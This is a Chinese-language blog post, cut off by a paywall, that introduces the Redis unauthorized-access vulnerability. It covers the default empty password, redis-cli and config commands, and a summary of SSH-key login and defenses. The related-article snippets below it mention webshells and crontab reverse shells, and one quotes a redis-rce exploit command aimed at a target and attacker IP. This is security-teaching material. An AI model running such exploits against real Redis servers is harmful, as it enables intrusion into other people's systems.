Redis未授权访问漏洞

最新推荐文章于 2024-05-17 19:54:38 发布
最新推荐文章于 2024-05-17 19:54:38 发布
阅读量380 收藏
点赞数 1
分类专栏: 网络安全技能树 零基础学网络安全 计算机 文章标签: web安全 安全 学习 笔记 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/zxcvbnmasdflzl/article/details/131894997
版权
本文介绍了Redis未授权访问漏洞的原理、利用条件及危害,包括通过配置命令获取存储路径和文件名、利用python脚本扫描漏洞、通过SSH公钥实现远程登录。同时,提出了设置密码、限制权限和防止外网访问等防御策略。
摘要由CSDN通过智能技术生成

前言

​ 传统数据库都是持久化存储到硬盘中,所以执行某些业务时传统数据库并不是很理想。redis等数据存储在内存中的数据库就应允而生了。基于内存的Redis读速度是110000次/s,写速度是81000次/s 。但是基于内存的缺点就是断电即失,如果服务器产生了意外,内存中的数据就会全部丢失,企业使用redis就冒着很大的风险。所以redis支持持久化存储(rbd与aof),在满足一定条件的情况下会自动保存到硬盘或者通过命令手动保存到硬盘。

​ 上面的一切都很美好,直到一群搞安全的人发现redis中的默认配置是空口令(可以远程登录直接读取服务器内存中的数据),然后进入redis中发现可以手动更改持久化存储的路径和文件名(这样就可以在指定的路径写入某些的特殊的内容)--------->redis未授权访问漏洞就诞生了。

redis相关命令

  • redis-cli

    • -h 连接指定host
    • -p 指定端口
    • -x 从标准输入中读取数据并且作为redis-cli的最后一个参数
    root@b6134771890d:/data# echo 123|redis-cli -h 127.0.0.1 -p 6379 -x set test
OK
root@b6134771890d:/data# redis-cli -h 127.0.0.1 -p 6379
127.0.0.1:6379> get test
"123\n"

  • config

    • config get dir 获取redis用于文件持久化存储的路径
    • config get dbfilename 获取redis用于文件持久化存储的文件名
    • config set dir xxx
最低0.47元/天 解锁文章
网络安全-生
关注
专栏目录
redis 授权访问 (CNVD-2019-21763)
qq_32445755的博客
10-03 970
近日,Redis 被爆出Redis 4.x/5.x 版本存在主从同步命令执行漏洞,攻击者通过构造特定的请求实现漏洞利用,成功利用漏洞可在目标服务器上实现Getshell,风险较高。目前漏洞的利用方式已被公开。CNVD-2015-07557也可以复现。
漏洞复现】redis授权访问
飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘
08-16 1163
Redis服务在一台服务器上可以同时启动多个Redis进程,Redis的实际处理速度则是完全依靠于主进程的执行效率。若在服务器.上只运行一个Redis进程, 当多个客户端同时访问时,服务器的处理能力是会有一-定程度的下降;即:在实际生产环境中,需要根据实际的需求来决定开启多少个Redis进程。Redis(Remote Dictionary Server ),即远程字典服务,是一个开源的使用ANSI C语言编写、支持网络、可基于内存亦可持久化的日志型、Key-Value数据库,并提供多种语言的API。....
redis授权访问(cnvd_2019_21763)
qq_14902381的博客
08-12 2425
redis授权访问漏洞,(cnvd_2019_21763)
redis授权访问漏洞
热门推荐
jiji_king的博客
07-07 1万+
个人笔记
关于Redis授权访问漏洞利用的介绍与修复建议
01-21
本文主要给大家介绍了关于Redis授权访问漏洞利用的相关内容,文中对该漏洞进行了详细,并给出了相对应的修复/安全建议,下面话不多说了,来一起看看详细的介绍吧。 一、漏洞介绍 Redis 默认情况下,会绑定在 0.0....
Redis授权访问漏洞引出的漏洞利用方式
Chu_Jian_Xiong的博客
11-20 1354
redis授权访问漏洞是一个由于redis服务版本较低其设置登录密码导致的漏洞,攻击者可直接利用redis服务器的ip地址和端口完成redis服务器的远程登录,对目标服务器完成后续的控制和利用。
Redis授权访问漏洞(一)先导篇
把自己活成一道光,因为你不知道,谁会借着你的光,走出了黑暗。请保持心中的善良,因为你不知道,谁会借着你的善良,走出了绝望。请保持你心中的信仰,因为你不知道,谁会借着你的信仰,走出了迷茫。请相信自己的力量,因为你不知道,谁会因为相信你,开始相信了自己....
01-09 1508
Redis默认情况下,会绑定在0.0.0.0:6379,如果没有进行采用相关的策略,比如添加防火墙规则避免其他非信任来源ip访问等,这样将会将Redis服务暴露到公网上。如果在没有设置密码认证(一般为空)的情况下,会导致任意用户在可以访问目标服务器的情况下授权访问 Redis以及读取Redis的数据。
redis漏洞修复:(CNVD-2019-21763)
大新新大浩浩的博客
09-22 961
redis漏洞修复:(CNVD-2019-21763) docker形式运行的redis的防火墙规则配置
VULFOCUS-redis授权访问(CNVD-2019-21763 )
HAKUNAMATATATTA的博客
11-30 2782
redis授权访问,主从复制RCE
redis授权访问漏洞(三种方法)
网安小白的博客
08-30 5822
redis授权访问复现,含写入webshell、linux计划任务反弹shell、写入ssh公钥实现ssh登录三种方法~
Redis漏洞利用总结
YouthBelief的博客
10-29 6737
redis漏洞利用前言一、redis4.x`5.x授权访问漏洞0x01 漏洞描述0x02 影响范围0x03 环境搭建0x03 漏洞利用探测漏洞授权登录3.1 利用rediswebshell利用前提利用方法3.2 利用“公私钥” 认证获取root权限3.3 利用crontab反弹shell0x04 漏洞修复 前言 redis是一个开源的使用ANSI C语言编写、支持网络、可基于内存亦可持久化的日志型、Key-Value数据库,并提供多种语言的API。Redis默认使用 6379 端口。 一、redis4
Redis授权访问漏洞复现 CNVD-2019-21763 & CNVD-2015-07557
最新发布
MateSnake的博客
05-17 1519
Redis授权访问漏洞复现 CNVD-2019-21763 & CNVD-2015-07557
Redis远程命令执行漏洞修复方法(CNVD-2019-21763)
zhangyuxun3的博客
03-30 3394
漏洞详情: 近日,Redis 被爆出Redis 4.x/5.x 版本存在主从同步命令执行漏洞,攻击者通过构造特定的请求实现漏洞利用,成功利用漏洞可在目标服务器上实现Getshell,风险较高。目前漏洞的利用方式已被公开。 漏洞评级: 高危漏洞 影响范围: Redis版本 >=4.0、>=5.0 漏洞复现 安装最新版 redis (5.0.5)并正常启动: 在攻击机上执行EXP,同时可以看到服务器上的日志输出: 成功后可以执行任意命令: 修复方案 (由于目前Redis厂商发布正式版本的修复
Redis远程代码执行(cnvd-2019-21763)
m0_65150886的博客
02-18 224
由于在Reids 4.x及以上版本中新增了模块功能,攻击者可通过外部拓展,在Redis中实现一个新的Redis命令。python3 redis-master.py -r 目标IP -p 目标端口 -L 攻击IP -P 8888 -f RedisModulesSDK/exp.so -c "id"Redis是一个开源的使用ANSI C语言编写、支持网络、可基于内存亦可持久化的日志型、Key-Value数据库,并提供多种语言的API。3.返回上一级目录,利用exp工具,执行id命令。1.下载exp利用工具。
【Vulfocus漏洞复现】redis-cnvd_2019_21763、redis-cnvd_2015_07557
weixin_45632448的博客
04-02 3924
vps:腾讯云 centos8 本地:windows11 靶场环境:http://123.58.236.76:47109/ 在vps上执行以下命令 git clone https://github.com/n0b0dyCN/RedisModules-ExecuteCommand cd RedisModules-ExecuteCommand/ make 编译之后继续执行命令 git clone https://github.com/Ridter/redis-rce.git cd redis-rce/
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

网络安全-生

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值